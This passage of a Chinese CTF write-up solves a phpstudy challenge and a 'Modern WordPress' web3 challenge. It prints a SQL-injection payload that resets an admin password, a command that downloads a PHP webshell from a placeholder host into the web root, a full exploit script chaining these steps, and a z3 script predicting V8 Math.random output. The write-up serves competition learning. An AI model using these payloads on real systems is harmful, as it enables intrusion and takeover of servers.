\u8bed\u6cd5\u7684\u8bed\u53e5\uff0c\u975e\u5e38\u56f0\u96be\u3002<\/p>\n
\u63a5\u7740 nc \u8fde\u4e0a 8090\uff0c\u8bd5\u8bd5\u5b83\u8fd9\u4e2a\u534f\u8bae\u3002\u5982\u679c\u6bcf\u884c\u6253\u4e00\u4e2a JSON^^^\uff0c\u662f\u53ef\u4ee5\u5728\u5355\u4e2a\u8fde\u63a5\u5185\u6267\u884c\u591a\u6b21\u7684\uff0c\u5373\u4f7f\u524d\u9762\u62a5\u9519\u4e86\u4e5f\u80fd\u7ee7\u7eed\uff0c\u8fd9\u4e00\u70b9\u5f88\u91cd\u8981\u3002\u5176\u5b83\u63a5\u53e3\u4e5f\u9700\u8981\u9274\u6743\uff0c\u4f7f\u7528\u7684 TOKEN \u7531\u767b\u5f55\u63a5\u53e3\u8fd4\u56de\uff0c\u5927\u6982\u770b\u4e86\u4e00\u4e0b\uff0c\u4fdd\u5b58\u5728 std::map \u91cc\uff0c\u5c31\u522b\u8bf4\u5565\u4f2a\u9020\u4e86\u3002<\/p>\n
\u7efc\u5408\u4ee5\u4e0a\u7684\u6240\u6709\u4fe1\u606f\uff0c\u518d\u6b21\u660e\u786e\u73b0\u9636\u6bb5\u7684\u76ee\u6807\uff0c\u9996\u5148\u5f97\u767b\u5f55\u8fdb\u8fd9\u4e2a\u7cfb\u7edf\u3002\u90a3\u4e48\u5165\u53e3\u70b9\u80af\u5b9a\u662f\u8fd9\u4e2a SQL \u6ce8\u5165\u3002\u53ef\u4ee5\u60f3\u5230\uff0c\u5982\u679c\u652f\u6301\u591a\u8bed\u53e5\u6267\u884c\u7684\u8bdd\uff0c\u53ef\u4ee5\u76f4\u63a5\u63d2\u5165\u4e00\u4e2a\u6076\u610f INSERT \u66f4\u65b0 admin \u7684\u5bc6\u7801\uff0c\u800c\u5728\u672c phpstudy \u4e2d\uff0c\u5982\u679c\u5728\u67e5\u8be2\u4e2d\u63d2\u5165\u591a\u4e2a SELECT\uff0c\u53ea\u6709\u6700\u540e\u4e00\u4e2a\u7684\u7ed3\u679c\u4f1a\u88ab\u8fd4\u56de\uff0c\u4e5f\u5c31\u662f\u8bf4\u5176\u4f7f\u7528\u7684 c sqlite \u5e93\u786e\u5b9e\u662f\u652f\u6301\u591a\u8bed\u53e5\u6267\u884c\u7684\u3002<\/p>\n
\u73b0\u5728\u8fd8\u9700\u8981 ADMINS \u7684\u8868\u7ed3\u6784\u4ee5\u53ca\u5bc6\u7801\u7684 MD5 \u6765\u5b8c\u6210\u8fd9\u4e00\u6b65\u9aa4\u3002\u524d\u8005\u76f4\u63a5 strings \u4e00\u4e0b\u5c31\u80fd\u770b\u5230\uff0c\u800c\u540e\u8005\uff0c\u8fd9\u8fd8\u80fd\u662f\u4e2a\u95ee\u9898\uff1f\u4f46\u662f\u5c31\u662f\u600e\u4e48\u8bd5\u5c31\u662f\u4e0d\u5bf9\u3002\u5e94\u8be5\u4e0d\u4f1a\u6709\u4eba\u60f3\u53bb\u628a\u5b83 MD5 \u7684\u7b97\u6cd5\u9006\u51fa\u6765\uff0c\u4e8e\u662f\u4e00\u4e2a\u76f4\u89c2\u7684\u60f3\u6cd5\u662f\uff0c\u628a\u5bc6\u7801\u5148\u6539\u6210 123456\uff0c\u7136\u540e\u5728\u6570\u636e\u5e93\u4e2d\u627e\u5230\u5bf9\u5e94 hash \u503c\u3002\u4f46\u662f\u6570\u636e\u5e93\u5462\uff1f\u641c\u4e86\u534a\u5929\u6ca1\u627e\u5230\uff0cstrace openat \u4e86\u4e5f\u6ca1\u627e\u5230\uff0c\u6709\u70b9\u6000\u7591\u4eba\u751f\u3002\u518d\u770b\u770b\u4ee3\u7801\uff0c\u80fd\u53d1\u73b0\u5e95\u4e0b\u8fd9\u4e2a\u9006\u5929\u7684\u6df7\u6dc6\uff1a<\/p>\n
<\/p>\n<\/p>\n\u66f4\u8981\u547d\u7684\u662f\uff0c\u76f4\u63a5\u628a\u6570\u636e\u5e93\u8131\u51fa\u6765\u7528 sqlcipher \u8fd8\u6253\u4e0d\u5f00\uff0c\u4f30\u8ba1\u662f\u5b83\u5728 depends \u91cc hook \u4e86 sqlite3 \u7cfb\u5217\u51fd\u6570\uff0c\u53c8\u52a0\u5bc6\u4e86\u4e00\u6b21\u3002\u4e00\u4e2a MD5 \u641e\u5f97\u8fd9\u4e48\u9ebb\u70e6\uff1f\u7528 gdb \u4e5f\u4e0b\u4e0d\u4e86 breakpoint\uff0c\u4e0d\u77e5\u9053\u53c8\u5e72\u4e86\u5565\u3002\u7136\u540e\u60f3\u5230\u5b83\u4f1a\u5728\u6267\u884c\u5931\u8d25\u7684\u65f6\u5019\u6253\u5370 log\uff0c\u4e8e\u662f\u5c31\u627e\u4e86\u4e2a\u8bed\u53e5\u91cc\u8fb9\u5e26 MD5 \u7684\uff0c\u8ba9\u5b83\u62a5\u9519\uff0c\u5c31\u80fd\u5728\u56de\u663e\u91cc\u770b\u5230\u4e4b\u524d\u5fc3\u5fc3\u5ff5\u5ff5\u7684\u5bc6\u7801 hash\uff0c\u8fd9\u91cc\u7528\u4e86 add_admin \u8fd9\u4e2a command\u3002<\/p>\n
<\/p>\ncmd5 \u7adf\u7136\u8fd8\u8ba4\u8bc6\uff0c\u53cd\u6b63\u6211\u4e0d\u8ba4\u8bc6\u3002\u603b\u4e4b hash \u6709\u4e86\uff0c\u8868\u7ed3\u6784\u6709\u4e86\uff0c\u5c31\u53ef\u4ee5\u6784\u9020\u8fd9\u6837\u7684 command \u8fdb\u884c SQL \u6ce8\u5165\u3002<\/p>\n
<\/p>\n{\"command\":\"login\",\"data\":{\"username\":\"aaa'; UPDATE ADMINS SET PASSWORD='c26be8aaf53b15054896983b43eb6a65'; -- a\",\"pwd\":\"123456\"},\"token\":\"\"}<\/pre>\n\u6700\u540e\u5343\u4e07\u522b\u8ba9\u5b83\u8fd4\u56de\u5565\u7ed3\u679c\uff0c\u5426\u5219\u8fdb\u5165\u63d2\u5165\u65e5\u5fd7\u6d41\u7a0b\u7684\u65f6\u5019\u5c31\u4f1a\u5d29\u6e83\uff0c\u53cd\u6b63\u6211\u662f\u633a\u96be\u5d29\u3002<\/p>\n
\u4fee\u6539\u8fc7\u540e\uff0c\u5c31\u53ef\u4ee5\u6b63\u5e38\u4f7f\u7528 123456 \u5bc6\u7801\u767b\u5f55\u4e86\u3002\u5728\u9762\u677f\u91cc\u5927\u6982\u7ffb\u4e86\u7ffb\uff0c\u6587\u4ef6\u64cd\u4f5c\u57fa\u672c\u4e0a\u662f\u7531 9080 \u7684 php \u5b9e\u73b0\u7684\uff0c\u4e0d\u8fc7\u6709\u4e2a\u4e0b\u8f7d\u8fdc\u7a0b\u6587\u4ef6\u7684\u529f\u80fd\uff0c\u53c2\u6570\u76f4\u63a5\u4f20\u8fdb json\uff0c\u662f\u540e\u7aef\u5b9e\u73b0\u7684\u3002<\/p>\n
<\/p>\n\u76f4\u63a5\u5f80 wwwroot \u91cc\u4e0b shell \u5c31\u5b8c\u4e8b\u4e86\u3002\u6d4b\u8fc7\u4e4b\u540e\uff0c\u786e\u5b9e\u662f\u53ef\u4ee5\u7684\u3002\u4e5f\u5c31\u662f\u8bf4\uff0c\u6574\u4f53\u4e0a\u7684\u653b\u51fb\u94fe\u5df2\u7ecf\u5b8c\u6210\u3002<\/p>\n
{\"command\":\"download_remote_file\",\"uid\":4,\"data\":{\"remote_url\":\"http:\/\/IP\/shell.php\",\"download_to\":\"\/www\/admin\/localhost_80\/wwwroot\/shell.php\"},\"token\":\"TOKEN\"}<\/pre>\n\u8fd8\u5269\u4e0b\u51e0\u4e2a\u95ee\u9898\uff0c\u4e00\u662f\u6ca1\u6709\u56de\u663e\uff0c\u800c TOKEN \u7531 login command \u8fd4\u56de\uff0c\u4e5f\u8ddf\u968f\u673a session \u5237\u65b0\u4e86\u4e00\u6837\uff0c\u4e0d\u592a\u53ef\u63a7\u3002\u5e78\u597d\u591a\u770b\u4e86\u773c\u5b83\u7684\u751f\u6210\u7b97\u6cd5\uff1a<\/p>\n
<\/p>\n\u53d1\u73b0\u7adf\u7136\u662f timestamp\uff0c\u4e0d\u662f\u9884\u671f\u7684\u968f\u673a\u6570\uff0c\u5e95\u4e0b\u8fd8 insert \u62fc\u63a5\uff0cMD5 \u4e86\u51e0\u6b21\u3002\u9274\u4e8e\u6ca1\u6709\u529e\u6cd5\u8c03\u8bd5\uff0ctcpdump \u6293\u4e86\u4e2a\u5305\uff0c\u6700\u540e\u731c\u51fa\u6765\u4e86\uff1a
md5(md5('admin'+timestamp).upper())<\/code><\/p>\n<\/p>\nTOKEN \u7684\u95ee\u9898\u89e3\u51b3\uff0c\u5728\u53d1\u9001 login command \u7684\u65f6\u5019\u8ba1\u7b97\uff0c\u4e4b\u540e\u7684\u8bf7\u6c42\u5e26\u4e0a\u5373\u53ef\u3002<\/p>\n
\u73b0\u5728\u5c31\u5269\u6700\u540e\u4e00\u6b65\uff0c\u5c06\u8fd9\u4e9b\u64cd\u4f5c\u96c6\u6210\u5230\u4e00\u5f00\u59cb\u7684 file_get_contents() \u91cc\u9762\u3002\u4f46\u662f\u5f88\u5feb\u5c31\u9047\u5230\u4e86\u65b0\u7684\u95ee\u9898\uff0c\u7528 tcpdump \u53ef\u4ee5\u770b\u5230\uff0cf_g_c() \u53d1\u9001\u5b8c\u8bf7\u6c42\u540e\uff0c\u53ea\u6536\u5230\u4e86\u524d\u9762 parse error: GET \/ … \u8fd9\u4e2a\u56de\u5305\uff0c\u540e\u9762\u7684 ^^^ \u4f3c\u4e4e\u6ca1\u6709\u88ab\u89e3\u6790\uff0c\u8fd9\u4e0e\u5728 nc \u4e2d\u5f97\u5230\u7684\u7ed3\u679c\u4e0d\u540c\uff0c\u4e3a\u4ec0\u4e48\u5462\uff1f<\/p>\n
\u4ece\u90a3\u4e2a\u5de8tm\u957f\uff0cIDA F5 \u8dd1\u4e86\u4e24\u5c0f\u65f6\u6ca1\u51fa\u6765\u6700\u540e\u653e\u5f03\u4e86\u7684\u4e3b\u8c03\u5ea6\u51fd\u6570\u4e2d\u56de\u6eaf\uff0c\u53ef\u4ee5\u770b\u5230\u5904\u7406 socket \u7684\u6d41\u7a0b\u3002<\/p>\n
<\/p>\n\u5927\u6982\u5c31\u662f\uff0c\u6b7b\u5faa\u73af\u91cc\u8fb9 read()\uff0c\u6709\u6570\u636e\u4e4b\u540e\u52a0\u8fdb\u7f13\u51b2\u533a\uff0c\u641c\u7b2c\u4e00\u4e2a ^^^ \u8fdb\u884c\u5904\u7406\u3002\u4e5f\u5c31\u662f\u8bf4\uff0c\u5982\u679c\u6211\u4eec\u53d1\u9001\u5f97\u592a\u5feb\uff0c\u7b2c\u4e00\u6b21\u5c31\u5168\u90e8 read \u8fdb\u6765\u4e86\uff0c\u5904\u7406\u5b8c\u7b2c\u4e00\u6761 command \u4e4b\u540e\u5373\u4f7f\u8fd8\u6709\u7b2c\u4e8c\u4e2a\uff0c\u4e5f\u4f1a\u5728 read() \u5904\u963b\u585e\uff0c\u6ca1\u6cd5\u7ee7\u7eed\u6267\u884c\u3002\u4e4b\u524d nc \u4e00\u884c\u884c\u5730\u53d1\u9001\u6b63\u597d\u907f\u514d\u4e86\u8fd9\u79cd\u60c5\u51b5\u7684\u53d1\u751f\u3002<\/p>\n
\u90a3\u73b0\u5728\u600e\u4e48\u529e\u5462\uff1ffile_get_contents() \u80af\u5b9a\u662f\u6ca1\u6cd5\u7b49\u5230\u6570\u636e\u53d1\u56de\u6765\uff0c\u518d\u63a5\u7740\u7ee7\u7eed\u53d1\u7684\u3002\u5176\u5b9e\u53ef\u4ee5\u53d1\u73b0\uff0c\u53ea\u8981\u8ba9 read() \u4e0d\u963b\u585e\u5c31\u884c\u4e86\uff0c^^^ \u53ef\u4ee5\u5305\u542b\u5728\u521a\u5f00\u59cb\u53d1\u8fc7\u53bb\u7684\u6570\u636e\u91cc\uff0c\u4e5f\u5c31\u662f\u8bf4\uff0c\u53ef\u4ee5\u7528\u4e00\u5806\u5783\u573e\u6570\u636e\u4e0d\u65ad\u586b\u6ee1 read \u7684\u7f13\u51b2\u533a\uff0c\u8ba9 f_g_c() \u4e00\u76f4\u53d1\uff0c\u7b49\u5230 phpstudy \u5904\u7406\u5b8c\u7b2c\u4e00\u4e2a parse error \u4e3a\u6b62\uff0c\u5982\u679c\u6570\u636e\u8d3c\u591a\uff0c\u8fd8\u5728\u53d1\u7684\u8bdd\uff0c\u5c31\u80fd\u987a\u5229\u6267\u884c\u7b2c\u4e8c\u6761 command\u3002<\/p>\n
\u81f3\u6b64\uff0c\u5df2\u7ecf\u5b8c\u6210\u672c\u9898\u653b\u51fb\u94fe\u4e2d\u6240\u6709\u7ec6\u8282\u3002<\/p>\n
trash data \u5237\u65b0\u7f13\u51b2\u533a ==> SQL \u6ce8\u5165\u4fee\u6539 admin \u5bc6\u7801 ==> \u57fa\u4e8e Timestamp \u8ba1\u7b97\u767b\u5f55 TOKEN ==> \u8fdc\u7a0b\u4e0b\u8f7d PHP shell \u81f3 wwwroot<\/p>\n
import requests, time, hashlib\r\n\r\nURL = 'http:\/\/ctf2024-entry.r3kapig.com:32182\/'\r\n\r\ndef send_json(pay):\r\n data = {'url': 'http:\/\/127.0.0.1:8090\/aaa',\r\n 'header': '^^^' + pay + '^^^' + 'A'*100000}\r\n try:\r\n res = requests.post(URL, data=data, timeout=3)\r\n except requests.exceptions.Timeout:\r\n print('timeout')\r\n else:\r\n print(res.status_code)\r\n\r\n\r\nsend_json('''{\"command\":\"login\",\"data\":{\"username\":\"aaa'; UPDATE ADMINS SET PASSWORD='c26be8aaf53b15054896983b43eb6a65'; -- a\",\"pwd\":\"123456\"},\"token\":\"\"}''')\r\nts = int(time.time())\r\nprint('timestamp', ts)\r\ntoken = hashlib.md5(hashlib.md5(('admin' + str(ts)).encode()).hexdigest().upper().encode()).hexdigest().upper()\r\nsend_json('''{\"command\":\"login\",\"data\":{\"username\":\"admin\",\"pwd\":\"123456\"},\"token\":\"\"}''')\r\nsend_json('''{\"command\":\"download_remote_file\",\"uid\":4,\"data\":{\"remote_url\":\"http:\/\/IP\/shell.php\",\"download_to\":\"\/www\/admin\/localhost_80\/wwwroot\/shell.php\"},\"token\":\"TOKEN\"}'''.replace(\"TOKEN\", token))<\/pre>\n\u540e\u8bb0\uff1a\u51fa\u9898\u4eba\u76f4\u63a5\u5199\u4e86\u4e2a\u8ba1\u5212\u4efb\u52a1 TASKMNG \u8868\uff0c\u6211\u538b\u6839\u6ca1\u6ce8\u610f\u5230\u3002<\/p>\n
<\/a>\u00a0<\/p>\n
- \n
- web >> Modern WordPress
\n<\/strong><\/span><\/li>\n<\/ul>\n\u4ee3\u7801\u5f88\u591a\uff0c\u5f88\u590d\u6742\uff0c\u9996\u5148\u660e\u786e\u4e00\u4e0b\u8981\u505a\u4ec0\u4e48\u3002<\/p>\n
\u8981\u83b7\u53d6 flag\u3002flag \u5728\u54ea\uff1f\/api\/flag \u8def\u7531\u91cc\u8fb9\u6709\u3002<\/p>\n
<\/p>\n\u7136\u540e\u9700\u8981 info.accounts[0].addr \u53ca\u5176\u79c1\u94a5\u7528\u6765\u7b7e\u540d\u3002\u8fd9\u4e2a\u53c8\u5728\u54ea\u91cc\uff1f\/api\/bot \u91cc\u9762\u6709\u3002<\/p>\n
<\/p>\n\u8fd9\u91cc\u662f\u4e2a XSS\uff0cadmin \u628a\u79c1\u94a5\u586b\u8fdb\u53bb\uff0c\u7136\u540e\u770b\u4e86\u770b Posts\u3002\u5148\u522b\u7ba1\u5177\u4f53\u548b X \u7684\uff0c\u627e\u627e\u5185\u5bb9\u4ece\u54ea\u91cc\u6765\u3002<\/p>\n
<\/p>\n\u53ef\u4ee5\u53d1\u73b0 admin \u67e5\u770b\u4e86\u81ea\u5df1\u7684 Posts\uff0c\u7136\u540e\u4e0a\u8fb9\u90a3\u4e2a dangerouslySetInnerHTML \u76f4\u63a5\u5c31\u628a\u6211\u4eec\u7684\u5185\u5bb9\u5408\u5e76\u8fdb\u53bb\uff0c\u4e00\u53d1 XSS \u4e86\u3002<\/p>\n
\u6240\u4ee5\u6211\u4eec\u7684\u76ee\u6807\u662f\uff0c\u4fee\u6539 admin \u7684 Posts \u4e3a\u6076\u610f\u5185\u5bb9\uff0c\u89e6\u53d1 XSS\u3002\u53ea\u6709\u8fd9\u6761\u8def\uff0c\u56e0\u4e3a\u5176\u4ed6\u5565\u53c2\u6570\u90fd\u4e0d\u53ef\u63a7\u3002<\/p>\n
\u90a3\u4e48\u73b0\u5728\u53ef\u4ee5\u505a\u4ec0\u4e48\u5462\uff1f\u6709\u4e2a\u533a\u5757\u94fe\uff0cweb3\uff0c\u60f3\u5e72\u70b9\u5565\u90fd\u8981\u91d1\u5e01\uff0c\u4f46\u662f\u521d\u59cb\u8d26\u6237\u91cc\u6ca1\u6709\u4f59\u989d\u3002\u6240\u4ee5\u9996\u5148\uff0c\u5f97\u5f80\u81ea\u5df1\u7684\u8d26\u6237\u91cc\u5145\u94b1\u3002\u770b \/api\/recharge \u53ef\u4ee5\u53d1\u73b0\u5145\u94b1\u662f\u8981\u7528 redeem code \u5145\u7684\u3002\u5b83\u751f\u6210\u7684\u903b\u8f91\u662f\u8fd9\u6837\uff1a<\/p>\n
<\/p>\n<\/p>\n\u7ecf\u5178 Math.random() \u4e86\uff0c\u5728 Node.JS \u91cc\u8fb9\u662f\u53ef\u4ee5\u9884\u6d4b\u7684\uff0c\u5f53\u7136\uff0c\u7406\u8bba\u4e0a\u4e5f\u53ef\u4ee5\u5411\u524d”\u9884\u6d4b”\u3002\u518d\u770b\u770b\u8fd9\u73a9\u610f\u5176\u4ed6\u7684\u8f93\u51fa\u70b9\u3002<\/p>\n
<\/p>\n\u53c8\u53d1\u73b0\uff0c\u7206 500 \u7684\u65f6\u5019\u987a\u4fbf\u628a\u8fd9\u73a9\u610f\u8f93\u51fa\u6765\u4e86\uff0c\u7ed9\u5b9a\u4e86\u8db3\u591f\u7684\u72b6\u6001\u4ee5\u540e\uff0c\u5c31\u53ef\u4ee5\u8fd8\u539f redeem code\u3002<\/p>\n
https:\/\/github.com\/PwnFunction\/v8-randomness-predictor<\/a><\/p>\n
\u7136\u800c\u518d\u4ed4\u7ec6\u770b\u770b\uff0c\u4f1a\u53d1\u73b0\u6709\u70b9\u4e0d\u5bf9\u5934\u3002\u8fd9\u91cc\u8f93\u51fa\u7684\u662f 36 \u8fdb\u5236\u7684 String\uff0c\u4e00\u6b21
Math.random().toString(36)<\/code> \u5c0f\u6570\u70b9\u540e\u6709 11 \u4f4d\uff0crecharge \u7684 16 \u957f\u5ea6\u7531\u4e24\u4e2a\u62fc\u63a5\u800c\u6765\uff0c\u4f46\u62a5\u9519\u91cc\u80fd\u83b7\u53d6\u7684\u53ea\u6709 10 \u4f4d\uff0c\u4e5f\u5c31\u662f\u6700\u540e\u4e00\u4f4d\u6ca1\u4e86\u3002<\/p>\n\u521a\u5f00\u59cb\u60f3\u7206\u7834\uff0c\u7136\u540e\u53d1\u73b0\u4e0d\u592a\u73b0\u5b9e\u3002\u5176\u5b9e V8 \u968f\u673a\u6570\u751f\u6210\u7684\u903b\u8f91\u5f88\u7b80\u5355\uff0c\u5c31\u662f\u4f4d\u79fb\u79fb\u5f02\u6216\u6216\uff0c\u6240\u4ee5\u7406\u8bba\u4e0a\u5931\u53bb\u4e86\u6700\u540e\u4e00\u4f4d\uff08\u5927\u7ea6 4~8 bit \u7684\u4fe1\u606f\uff09\uff0c\u662f\u80fd\u901a\u8fc7\u66f4\u591a\u7684\u72b6\u6001\u8865\u5145\u56de\u6765\u7684\u3002\u4e5f\u5c31\u662f\u8bf4\u8981\u505a\u7684\u5176\u5b9e\u5f88\u7b80\u5355\uff0c\u628a\u4ee3\u7801\u6539\u6210\u5411\u524d\u56de\u6eaf\u72b6\u6001\uff08”\u9884\u6d4b”\uff09\u7684\uff0c\u7136\u540e\u52a0\u5165 10 \u4e2a\u5de6\u53f3\u751f\u6210\u7684\u6570\uff08\u539f\u672c\u662f 5 \u4e2a\uff09\uff0c\u5728\u8ba1\u7b97\u65f6\u628a\u4f4e 8 \u4f4d mask \u6389\uff08\u8868\u793a\u672a\u77e5\uff09\uff0c\u7167\u6837\u80fd\u89e3\u51fa\u6765\u3002<\/p>\n
#!\/usr\/bin\/python3\r\nimport z3\r\nimport struct\r\n\r\ndef base_fromf(x):\r\n ret = 0.0\r\n base = 1\/36\r\n for i in range(len(x)):\r\n ret += base * int(x[i], 36)\r\n base \/= 36\r\n return ret\r\n\r\ndef base_tof(x):\r\n ret = ''\r\n while x > 1e-4:\r\n ret += '0123456789abcdefghijklmnopqrstuvwxyz'[int(x*36)]\r\n x = x*36 - int(x*36)\r\n return ret\r\n\r\ndef check(sequence):\r\n sequence = sequence[::-1]\r\n\r\n solver = z3.Solver()\r\n\r\n se_state0, se_state1 = z3.BitVecs(\"se_state0 se_state1\", 64)\r\n\r\n for i in range(len(sequence)):\r\n se_s1 = se_state0\r\n se_s0 = se_state1\r\n se_state0 = se_s0\r\n se_s1 ^= se_s1 << 23\r\n se_s1 ^= z3.LShR(se_s1, 17) # Logical shift instead of Arthmetric shift\r\n se_s1 ^= se_s0\r\n se_s1 ^= z3.LShR(se_s0, 26)\r\n se_state1 = se_s1\r\n\r\n if isinstance(sequence[i], str): \r\n solver.add(z3.BitVec(sequence[i], 64) == z3.LShR(se_state0, 12))\r\n continue\r\n\r\n float_64 = struct.pack(\"d\", sequence[i] + 1)\r\n u_long_long_64 = struct.unpack(\"<Q\", float_64)[0]\r\n\r\n # Get the lower 52 bits (mantissa)\r\n mantissa = u_long_long_64 & ((1 << 52) - 1)\r\n\r\n mask = ((1 << 64) - 1) & ~((1 << 8) - 1)\r\n # Compare Mantissas ( except lower 8 digits )\r\n solver.add((int(mantissa) & mask) == (z3.LShR(se_state0, 12) & mask))\r\n\r\n if solver.check() == z3.sat:\r\n return solver.model()\r\n return False\r\n\r\ndef answer(model):\r\n states = {}\r\n for state in model.decls():\r\n states[state.__str__()] = model[state]\r\n\r\n print(states)\r\n\r\n state0 = states[\"se_state0\"].as_long()\r\n\r\n for state in model.decls():\r\n if (mat:=state.__str__()).startswith('mat'):\r\n \r\n u_long_long_64 = (states[mat].as_long() >> 0) | 0x3FF0000000000000\r\n float_64 = struct.pack(\"<Q\", u_long_long_64)\r\n prev_sequence = struct.unpack(\"d\", float_64)[0]\r\n prev_sequence -= 1\r\n\r\n print(mat, prev_sequence, base_tof(prev_sequence))\r\n\r\norg = ['mat0','mat1','mat2','mat3','mat4','mat5']\r\n\r\ndef getapd(n):\r\n import requests\r\n ret = []\r\n for i in range(n):\r\n res = requests.post('http:\/\/ctf2024-entry.r3kapig.com:32090\/api\/backend', data='{\"js', headers={'Content-Type': 'application\/json'})\r\n print(i, num:=res.json()['data']['id'])\r\n ret.append(num)\r\n ret = ret[1:] # first for check\r\n print('')\r\n return ret\r\n\r\n# Array.from(Array(100), ()=>(Math.random().toString(36).substring(2).slice(0,10)))\r\napd = getapd(10)\r\n\r\napd = list(map(base_fromf, apd))\r\nprint(apd)\r\nmodel = check(org + apd)\r\nif model is False:\r\n print('unsolvable')\r\nelse:\r\n answer(model)<\/pre>\nPython \u7684 36 \u8fdb\u5236\u8f6c 10 \u8fdb\u5236\u5c0f\u6570\u8fd8\u6709\u70b9\u7cbe\u5ea6\u4e22\u5931\uff0c\u884c\u4e3a\u4e0d\u4e00\u81f4\uff0c\u5f88\u96be\u5d29\uff0c\u7ed3\u679c\u62f7\u5230 Node.JS \u4e0a\u9762\u518d\u8f6c\u3002<\/p>\n
\u6709\u4e86\u91d1\u5e01\u4ee5\u540e\u5c31\u53ef\u4ee5\u8fdb\u884c\u667a\u80fd\u5408\u7ea6\u7684\u94fe\u4e0a\u64cd\u4f5c\uff0c\u8fd9\u4e0a\u8fb9\u80fd register\uff0cpublish\uff0cedit\uff0c\u4f46\u95ee\u9898\u662f\uff0c\u90fd\u53ea\u80fd\u64cd\u4f5c\u81ea\u5df1\u7684\uff0c\u4e5f\u5c31\u662f sender.address\uff0c\u6ca1\u6cd5\u4fee\u6539\u522b\u4eba\uff0c\u6216\u8005\u8bf4 admin \u7684 Posts \u3002<\/p>\n
<\/p>\n\u518d\u4ed4\u7ec6\u770b\u770b\u8fd9\u91cc\uff0c\u8fd9\u4e2a undo() \u529f\u80fd\uff0c\u9996\u5148\u628a length \u51cf\u4e86 1\uff0c\u7136\u540e\u518d\u5224\u65ad\u5b83\u662f\u5426 >=0\u3002\u770b\u8d77\u6765\u597d\u50cf\u6ca1\u95ee\u9898\uff1f\u56e0\u4e3a require() \u4e0d\u6ee1\u8db3\uff0c\u4ea4\u6613\u5c31\u4e0d\u4f1a\u6210\u529f\u3002\u518d\u8bf4\u4e86\uff0c\u5c31\u7b97\u662f\u8d1f\u6570\u53c8\u80fd\u600e\u4e48\u6837\u3002\u7136\u540e\u53ef\u4ee5\u53d1\u73b0\uff0clength \u5728 solidity \u91cc\u662f\u4e2a uint256 \u7c7b\u578b\u7684\uff0c\u4e5f\u5c31\u662f\u8bf4 0-1 \u4f1a\u4e0b\u6ea2\u51fa\u81f3 2^256-1 \u6700\u5927\u503c\uff0c\u5bfc\u81f4\u8be5\u6570\u7ec4\u53ef\u4ee5\u5bf9\u4efb\u610f\u7684 offset \u8fdb\u884c\u8bbf\u95ee\uff0c\u7406\u8bba\u4e0a\u5f62\u6210\u4efb\u610f\u8bfb\u5199\u3002<\/p>\n
<\/p>\n\u8fd9\u91cc\u4fbf\u9700\u8981\u4e00\u4e9b solidity memory layout \u7684\u77e5\u8bc6\u3002<\/p>\n
https:\/\/docs.soliditylang.org\/en\/v0.8.17\/internals\/layout_in_storage.html<\/a><\/p>\n
\u5bf9\u7740\u5b83\u7684\u5408\u7ea6\uff0cversion \u5360\u636e slot0\uff0c\u6211\u4eec\u5728\u7684 postMapping \u5bf9\u5e94 slot4\uff0c\u4e5f\u5c31\u662f\u8bf4\uff0cpostMapping[address] \u5bf9\u5e94\u7684 slot \u4e3a
keccak256(bytes32(account) + bytes32(4))<\/code> \u3002\u7531\u4e8e Post[] \u53c8\u662f dynamic array\uff0c\u9700\u8981\u5bf9\u4e4b\u524d\u5f97\u5230\u7684\u5730\u5740\u518d\u6b21 keccak256()\uff0c\u5f97\u5230\u8be5\u6570\u7ec4\u7684\u8d77\u59cb slot\u3002\u6570\u7ec4\u5185\u5404\u5143\u7d20\u5b58\u653e\u5730\u5740\u4e3akeccak256(\u8d77\u59cbslot + index)<\/code>\u3002<\/p>\n<\/p>\n\u6709\u4e86\u8be5\u6ea2\u51fa\u4e4b\u540e\uff0c\u7531\u4e8e solidity \u5bf9\u6bcf\u4e2a\u5408\u7ea6\u5171\u7528\u4e00\u4e2a 2^256 slot \u5927\u5c0f\u7684\u5730\u5740\u7a7a\u95f4\uff0c\u4e5f\u5c31\u662f\u8bf4\uff0c\u7531\u6211\u4eec\u7684 Post[] \u662f\u53ef\u4ee5\u8bbf\u95ee\u5230\u5bf9\u5e94 admin \u7684 Post[] \u6570\u7ec4\u7684\uff0c\u53ea\u662f\u9700\u8981\u6ce8\u610f\u5230\u4e00\u4e9b\u7b80\u5355\u7684\u8ba1\u7b97\u3002\u8fd9\u91cc\u8fd8\u8981\u7279\u522b\u6ce8\u610f\uff0c\u7531\u4e8e struct Post \u5360 3 \u4e2a slot\uff0c\u6240\u4ee5\u8ba1\u7b97 offset \u65f6\u9700\u8981\u9664\u4ee5 3\uff0c\u5e76\u4fdd\u8bc1\u80fd\u591f\u6574\u9664\uff0c\u5426\u5219\u9700\u8981\u66f4\u6362\u5730\u5740\u7ee7\u7eed\u3002<\/p>\n
mypos = keccak256(keccak256(bytes32(account) + bytes32(4)))\r\nadmin = '0x04478cD6BD7DE5f721a88d25A2f44edba2627276'[2:].lower() # <--- admin public address\r\napos = keccak256(keccak256(bytes32(admin) + bytes32(4)))\r\n\r\noffset = int(apos, 16) - int(mypos, 16)\r\nif offset < 0:\r\n offset += 2**256\r\nassert(offset % 3 == 0)\r\noffset \/\/= 3<\/pre>\n
\u8fd9\u6837\u5f97\u51fa\u7684 offset\uff0c\u5c31\u662f\u5728\u8bbf\u95ee\u6211\u4eec\u7684 Post[] \u6570\u7ec4\u65f6\uff0c\u6307\u5b9a\u6b64 index \u4fbf\u80fd\u795e\u5947\u5730\u8bbf\u95ee\u5230 admin \u7684\u7b2c\u4e00\u7bc7 Post\uff01\u540c\u7406\uff0c\u5c31\u53ef\u4ee5 edit() \u8fd9\u7bc7\u6587\u7ae0\u4e3a\u6076\u610f XSS payload\uff0c\u7136\u540e\u8ba9 admin \u53bb\u8bbf\u95ee\u3002<\/p>\n
\u90a3\u4e48\u63a5\u4e0b\u6765\uff0c\u89e3\u51b3 XSS \u7684\u95ee\u9898\u3002\u6211\u4eec\u8981\u5077\u7684 private key \u5b83\u6070\u597d\u4e0d\u597d\uff0c\u4e0d\u5728 cookie \u91cc\uff0c\u4e5f\u4e0d\u5728 localStorage \u91cc\uff0c\u504f\u504f\u5c31\u5728 React \u5199\u7684\u524d\u7aef\u7684\u4e00\u4e2a Context (Provider) \u91cc\u3002\u8fd9\u548b\u6574\uff1f\u53bb\u9006\u7f16\u8bd1\u51fa\u6765\u7684 js \u80af\u5b9a\u662f\u4e0d\u53ef\u80fd\u7684\u3002\u5176\u5b9e\u518d\u60f3\u60f3\uff0c\u80fd\u53d1\u73b0\u5b83\u7684\u8fd9\u4e9b props \u80af\u5b9a\u662f\u5b58\u5728 DOM 